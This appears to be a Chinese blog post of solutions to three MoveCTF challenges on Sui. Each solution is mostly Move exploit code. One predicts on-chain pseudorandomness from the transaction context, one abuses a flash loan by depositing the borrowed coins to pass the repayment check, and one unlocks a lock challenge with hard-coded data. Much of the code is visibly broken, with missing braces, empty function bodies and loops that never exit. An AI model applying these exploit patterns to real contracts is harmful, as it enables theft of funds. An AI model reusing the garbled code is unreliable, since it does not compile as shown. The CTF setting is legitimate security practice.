ComingChat团队 movectf比赛 总共三题 三个满分

发布于 阅读 941

MoveCTF 三题满分答案



/ SPDX-License-Identifier: Apache-2.0
// Based on:

/// @title pseudorandom
/// @notice A pseudo random module on-chain.
/// @dev Warning:
/// The random mechanism in smart contracts is different from
/// that in traditional programming languages. The value generated
/// by random is predictable to Miners, so it can only be used in
/// simple scenarios where Miners have no incentive to cheat. If
/// large amounts of money are involved, DO NOT USE THIS MODULE to
/// generate random numbers; try a more secure way.
module 0x0::test {
    use std::hash;
    use std::vector;

    use sui::bcs;
    use sui::tx_context::TxContext;
    use game::hero::{Hero, level_up};
    use game::adventure::{slay_boar, slay_boar_king};
    use sui::object;
    use game::inventory::{get_flag, TreasuryBox};

    const ERR_HIGH_ARG_GREATER_THAN_LOW_ARG: u64 = 101;

    public fun vector_slice<T: copy>(vec: &vector<T>, start: u64, end: u64): vector<T> {
        let slice = vector::empty<T>();
        let i = start;
        while (i < end) {
            vector::push_back(&mut slice, *vector::borrow(vec, i));
            i = i + 1;

    public fun vector_to_u64(d: &vector<u8>): u64 {
        let i = 0;
        let m = 0;
        let len = vector::length(d);
        while (i < vector::length(d)) {
            m = (m << 8) + ((*vector::borrow(d, len - 1 - i)) as u64);
            i = i + 1;

    public fun u64_to_vector(d: u64): vector<u8> {

    public fun seed(ctx: &mut TxContext, m: u64): vector<u8> {
        let ctx_bytes = bcs::to_bytes(ctx);
        let tx_hash = vector_slice(&ctx_bytes, 21, 21 + ((*vector::borrow(&ctx_bytes, 20)) as u64));
        let len = vector::length(&ctx_bytes);
        let created_vector = vector_slice(&ctx_bytes, len - 8, len);
        let created_num = vector_to_u64(&created_vector) + m;
        let created_vector = u64_to_vector(created_num);
        assert!(created_vector == u64_to_vector(created_num), 1);
        let data = vector::empty<u8>();
        vector::append(&mut data, vector_slice(&ctx_bytes, 0, len - 8));
        vector::append(&mut data, created_vector);
        let ctx_bytes = data;

        let info: vector<u8> = vector::empty<u8>();
        vector::append<u8>(&mut info, tx_hash);
        vector::append<u8>(&mut info, created_vector);
        let uid_bytes = vector_slice(&hash::sha3_256(info), 0, 20);

        let info: vector<u8> = vector::empty<u8>();
        vector::append<u8>(&mut info, ctx_bytes);
        vector::append<u8>(&mut info, uid_bytes);

        let hash: vector<u8> = hash::sha3_256(info);

    fun bytes_to_u64(bytes: vector<u8>): u64 {
        let value = 0u64;
        let i = 0u64;
        while (i < 8) {
            value = value | ((*vector::borrow(&bytes, i) as u64) << ((8 * (7 - i)) as u8));
            i = i + 1;
        return value

    /// Generate a random u64
    fun rand_u64_with_seed(_seed: vector<u8>): u64 {

    /// Generate a random integer range in [low, high).
    fun rand_u64_range_with_seed(_seed: vector<u8>, low: u64, high: u64): u64 {
        assert!(high > low, ERR_HIGH_ARG_GREATER_THAN_LOW_ARG);
        let value = rand_u64_with_seed(_seed);
        (value % (high - low)) + low

    /// Generate a random u64
    public fun rand_u64(ctx: &mut TxContext): u64 {
        rand_u64_with_seed(seed(ctx, 0))

    /// Generate a random integer range in [low, high).
    public fun rand_u64_range(low: u64, high: u64, ctx: &mut TxContext): u64 {
        rand_u64_range_with_seed(seed(ctx, 0), low, high)

    public entry fun win(hero: &mut Hero, ctx: &mut TxContext) {
        let i = 0;
        while (i < 125) {
            slay_boar(hero, ctx);
            i = i + 1;
        let next = next_zero_rand_u64_range(0, 100, ctx) - 4;
        while (next > 0) {
            next = next - 1;
        slay_boar_king(hero, ctx);

    public fun next_zero_rand_u64_range(low: u64, high: u64, ctx: &mut TxContext): u64 {
        let next = 0;
        while (true) {
            let data = rand_u64_range_with_seed(seed(ctx, next), low, high);
            if ((data == 0) && (next >= 4)) {
            next = next + 1;

    public entry fun win_flag(box: TreasuryBox, ctx: &mut TxContext) {
        let next = next_zero_rand_u64_range(0, 100, ctx);
        while (next > 0) {
            next = next - 1;
        get_flag(box, ctx);


module 0x0::test {
    use sui::tx_context::TxContext;
    use movectf::flash::{loan, FlashLender, deposit, check, withdraw, get_flag};

    entry fun fight(
        self: &mut FlashLender,
        ctx: &mut TxContext
    ) {
        let (coins, receipt) = loan(self, 1000, ctx);
        deposit(self, coins, ctx);
        check(self, receipt);
        withdraw(self, 1000, ctx);
        get_flag(self, ctx)


module 0x0::test {
    use sui::tx_context::TxContext;
    use movectf::move_lock::{
        movectf_unlock, get_flag, ResourceObject

    entry fun fight(
        r: &mut ResourceObject,
        ctx: &mut TxContext
    ) {
        let data1 = vector<u64>[
            2, 14, 13,
            6, 17, 0,
            19, 20, 11,
            0, 19, 8,
            14, 13, 18,
            24, 14, 20,
            12, 0, 13,
            0, 6, 4,
            3, 19, 14,
            1, 17, 4,
            0, 10, 19,
            7, 4, 7,
            8, 11, 11,
            2, 8, 15,
            7, 4, 17,
            7, 0, 2,
            10, 19, 7,
            4, 7, 0,
            2, 10, 24,
            15, 11, 0,
            13, 4, 19

        let data2 = vector<u64>[25, 11, 6, 10, 13, 25, 12, 19, 2];

        movectf_unlock(data1, data2, r, ctx);

        get_flag(r, ctx)
标签: Sui